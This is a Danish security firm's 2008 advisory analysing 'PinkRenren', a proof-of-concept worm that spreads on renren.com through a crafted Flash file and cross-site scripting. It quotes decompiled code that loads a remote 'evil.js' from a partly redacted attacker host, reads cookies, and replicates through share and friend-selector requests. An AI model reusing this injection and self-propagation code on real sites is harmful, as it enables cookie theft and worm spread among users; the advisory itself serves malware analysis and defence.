Forsiden    Om os    Den Digitale Vægter    Rådgivning    Artikler    Referencer    Omtale    Nyheder    Kunde login   
   << Nyhedsoversigt
   
 
  Vidensdeling
  - Dialog skaber resultater
 
  Nyheder

Flash XSS orm (PinkRenren)

CSIS Research & intelligence har i nat opfanget en skadelig orm, som spreder sig  via Macromedia Flash og et XSS trick. Da antivirus branchen ikke har navngivet denne PoC orm har vi valgt at døbe den "PinkRenren". 

Der er tale om en særligt udformet Macromedia Flash Player Compressed Movie fil af filtypen .swf (1.swf), som via flere forskellige metoder forbinder sig til et domæne, hvorfra den henter og kører arbitrær script kode, som skyder infektionen igang. Script koden afvikles på grund af en designfejl i måden hvor .swf indlæses og behandles i Flash afspilleren. Vi undersøger netop nu om der er tale om en allerede kendt sårbarhed eller design per se.

SWF-filen indeholder en kontainer "(embed type="application/x-shockwave-flash&gt;, men denne SWF-fil har indlejret kode, der gør brug af den "forkerte" kontainer, indeholdende et "allowScriptAccess" kald der indlæser et eksternt script, som læses af Flash afspilleren med script kørselsrettigheder.

Når SWF filen dekompileres ses følgende læsbare kald til eksterne funktioner (saniteret af CSIS):

movie 'C:\1.swf' {
// flash 8, total frames: 1, frame rate: 12 fps, 420x315 px, compressed
  frame 1 {
    var fun = 'var x=document.createElement("SCRIPT");x.src=
"http://n.[fjernet af CSIS]08 1.com/xnxss1/evil.js";
x.defer=true;document.getElementsByTagName("HEAD")[0].appendChild(x);';
    flash.external.ExternalInterface.call('eval', fun);
  frame 1 {

loadMovie('http://www.tudou.com/player/outside/player_outside.swf?iid=4120048&default_skin=
http://js.tudouui.com/bin/player2/outside/Skin_outside_13.swf&autostart=false&rurl=', this);

Den eksterne reference (evil.js) indeholder bl.a. følgende funktioner/variabler:

// I'm not a malicious worm.^^;
var evil_js = "http://n.[fjernet af CSIS]08 1.com/xnxss1/evil.js";
var evil_swf = "http://o.[fjernet af CSIS]08 1.com/xnxss/1.swf";

Scriptet kalder "http://'+domain+'.renren.com/ajaxProxy.html?ver=2" der afvikler script kode i samme domæne, hvorved sikkerhedsdesignet, der skal forhindre "allowScriptAccess" udenfor domænet, omgåes med hjælp fra XSS (Cross Site Scripting) teknik.

function getMyCookies(){
        var myCookies = document.cookie;
        myCookies = myCookies.split(";")
        for(i = 0; i &lt; myCookies.length; i++){
                if(myCookies[i].indexOf("xssdata=")!=-1){

Besked og dermed replikering, sendes til "share.renren.com:

KLIP:

xhr_send("get","http://share.renren.com/share/buttonshare.do?
link=http://g.cn&title=2016",null,

"get_tsc");
  break;
 case "f":
  var url
='http://home.renren.com/friendsSelector.do?p={"init":false,"qkey":"friend","uid":true,"uname":

SNIP

Slutbrugere vil opleve, at de tilbydes et video klip af Pink Floyd klassikeren "Wish You Were Here", men når indholdet klikkes, vil scriptet blive kørt og replikationen vil begynde. Koden eksponeres mellem brugere ved at dele et link via servicen "share.renren.com".

PinkRenren er ikke skadelig, som tekst i scriptet (I'm not a malicious worm) også bebuder, men teknikken er potent.

Det skadelige script og SWF filen opnår 0 procent antivirus detektion hos samlet 27 producenter. Vi har sendt samples ud til antivirus industrien igennem vores distributionslister, og afventer at der udvikles signaturer der kan beskytte mod denne og tilsvarende orme.
 
  



CSIS Alert Service
Tilmeld dig vores populære alert
service. Vi giver dig 1
måneds prøve på relevante og
rettidige nyheder om it-sikkerhed.
 
 
     
 

© 2008 CSIS Security Group